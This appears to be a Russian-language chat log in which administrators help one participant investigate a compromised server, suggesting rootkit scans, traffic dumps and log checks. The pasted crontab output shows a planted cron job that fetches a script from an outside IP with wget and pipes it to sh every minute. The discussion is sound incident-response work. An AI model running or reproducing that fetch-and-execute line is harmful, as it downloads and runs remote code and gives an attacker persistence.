a6
rkhunter / chkrootkit прогони, потом задампай трафик и смотри бек-коннекты и связность с левыми хостами
Size: a a a
2020 November 23
D
сначала процессы надо смотреть и кроны, если червяк какой то связь с C&C (по-трафику аномалии)
редис убрал ::1, опять уже вылезло
D
rkhunter / chkrootkit прогони, потом задампай трафик и смотри бек-коннекты и связность с левыми хостами
руткитов нет, оно явно какую-то дыру в вебе ковыряет
MT
а в акксес логи логов овер9000 и просмотреть все не вариант?
D
глазами? грепом -надо знать что грепать
MT
ну глазами да
MT
идем на время и минуту рассматриваем
MT
если там конечно не овер9000
MT
ну а грепать хз что, какой-нить пост
MT
с поехавшими параметарми
D
sudo -u www-data crontab -l
* * * * * wget -q -O - http://195.3.146.118/ex.sh | sh > /dev/null 2>&1
* * * * * wget -q -O - http://195.3.146.118/ex.sh | sh > /dev/null 2>&1
MT
кстати была гдето уязвимость в пхп фпм
D
хм.
Но оно - refused
Но оно - refused
a6
руткитов нет, оно явно какую-то дыру в вебе ковыряет
сравни дифом содержимое проекта и гита
a6
sudo -u www-data crontab -l
* * * * * wget -q -O - http://195.3.146.118/ex.sh | sh > /dev/null 2>&1
* * * * * wget -q -O - http://195.3.146.118/ex.sh | sh > /dev/null 2>&1
классика чо
D
сравни дифом содержимое проекта и гита
git status - нет аномалий
D
классика чо
но оно не качается )
MT
MT
ну я думаю ты это смотрел ужа
MT